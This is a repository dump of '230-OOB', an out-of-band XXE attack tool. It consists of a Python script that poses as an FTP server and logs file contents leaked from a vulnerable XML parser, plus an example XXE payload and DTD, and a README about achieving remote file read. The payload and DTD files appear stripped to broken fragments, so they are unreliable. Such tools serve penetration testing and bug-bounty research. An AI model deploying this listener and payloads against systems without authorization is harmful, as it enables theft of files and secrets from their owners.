├── logo.png
├── oob.dtd
├── example_payload.xml
├── .gitattributes
├── README.md
├── .gitignore
└── 230.py
/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lc/230-OOB/HEAD/logo.png
--------------------------------------------------------------------------------
/oob.dtd:
--------------------------------------------------------------------------------
1 |
2 | :2121/%d;'>">
3 |
--------------------------------------------------------------------------------
/example_payload.xml:
--------------------------------------------------------------------------------
1 |
2 | %asd;%c;]>
3 | &rrr;
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
4 | # Custom for Visual Studio
5 | *.cs diff=csharp
6 |
7 | # Standard to msysgit
8 | *.doc diff=astextplain
9 | *.DOC diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot diff=astextplain
13 | *.DOT diff=astextplain
14 | *.pdf diff=astextplain
15 | *.PDF diff=astextplain
16 | *.rtf diff=astextplain
17 | *.RTF diff=astextplain
18 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
Out-of-Band XXE tool
5 |
6 | A python script to achieve file read via FTP!
7 |
8 |
10 |
11 | 230OOB is a tool that emulates an FTP server, assisting you in achieving file read via Out-of-Band XXE.
12 |
13 |
14 | ### Installation
15 | ```
16 | git clone https://github.com/lc/230-OOB
17 | ```
18 |
19 | ### Usage:
20 | Generate an XXE payload & DTD at http://xxe.sh
21 |
22 | Start the server:
23 | ```
24 | python3 230.py 2121
25 | ```
26 | everything will be logged to -> extracted.log
27 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Windows image file caches
2 | Thumbs.db
3 | ehthumbs.db
4 |
5 | # Folder config file
6 | Desktop.ini
7 |
8 | # Recycle Bin used on file shares
9 | $RECYCLE.BIN/
10 |
11 | # Windows Installer files
12 | *.cab
13 | *.msi
14 | *.msm
15 | *.msp
16 |
17 | # Windows shortcuts
18 | *.lnk
19 |
20 | # =========================
21 | # Operating System Files
22 | # =========================
23 |
24 | # OSX
25 | # =========================
26 |
27 | .DS_Store
28 | .AppleDouble
29 | .LSOverride
30 |
31 | # Thumbnails
32 | ._*
33 |
34 | # Files that might appear in the root of a volume
35 | .DocumentRevisions-V100
36 | .fseventsd
37 | .Spotlight-V100
38 | .TemporaryItems
39 | .Trashes
40 | .VolumeIcon.icns
41 |
42 | # Directories potentially created on remote AFP share
43 | .AppleDB
44 | .AppleDesktop
45 | Network Trash Folder
46 | Temporary Items
47 | .apdisk
48 |
49 | # Project files
50 | extracted.log
51 |
--------------------------------------------------------------------------------
/230.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import socket
3 | import sys
4 | import argparse
5 |
6 |
7 | name = """
8 | =--------------------------------------=
9 | | 230 OOB || an Out-Of-Band XXE tool |
10 | | ____ _____ ___ ___ ____ |
11 | | (___ \(__ / / _ \ / _ \| _ \ |
12 | | __) ) / / | | | | | | | |_) ) |
13 | | / __/ (__ \| | | | | | | _ ( |
14 | | | |___ ___) ) |_| | |_| | |_) ) |
15 | | |_____|____/ \___/ \___/|____/ |
16 | | by Corben Leo |
17 | | |
18 | | - https://www.corben.io |
19 | | - https://hackerone.com/cdl |
20 | | - https://twitter.com/hacker_ |
21 | =--------------------------------------=
22 | """
23 |
24 | print(name)
25 |
26 | parser = argparse.ArgumentParser(description='An Out-of-Band XXE tool by Corben Leo')
27 | parser.add_argument('port',type=int,help="Port for the FTP server to listen on (2121 / 21)")
28 | args = parser.parse_args()
29 |
30 | HOST = ''
31 | PORT = args.port
32 |
33 | welcome = b'220 oob-xxe\n'
34 | ftp_catch_all_response = b'230 more data please!\n'
35 | ftp_user_response = b'331 hello world!\n'
36 | ftp_pass_response = b'230 my password is also hunter2!\n'
37 |
38 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
39 |
40 | def main():
41 | try:
42 | s.bind((HOST, PORT))
43 | except socket.error as msg:
44 | print('[+] ERROR: Bind failed. ')
45 | sys.exit()
46 |
47 | s.listen(10)
48 | print('[+] 230OOB started on port: '+str(PORT))
49 |
50 |
51 | conn, addr = s.accept()
52 | print('[*] Connection from: '+addr[0]+"!")
53 | conn.sendall(welcome)
54 |
55 | while True:
56 | data = conn.recv(1024)
57 | ftp_command = data.split(b" ", 1)
58 | response = {
59 | 'user': ftp_user_response,
60 | 'pass': ftp_pass_response,
61 | }.get(ftp_command[0].lower(), ftp_catch_all_response)
62 | conn.sendall(response)
63 | line = data.decode('UTF-8')
64 | line = line.replace("\n","").replace("CWD","")
65 | print(line)
66 | extract(line)
67 | s.close()
68 |
69 | def extract(data):
70 | fopen = open('./extracted.log', 'a')
71 | fopen.write(data)
72 | fopen.close()
73 |
74 | try:
75 | main()
76 | except KeyboardInterrupt:
77 | s.close()
78 |
--------------------------------------------------------------------------------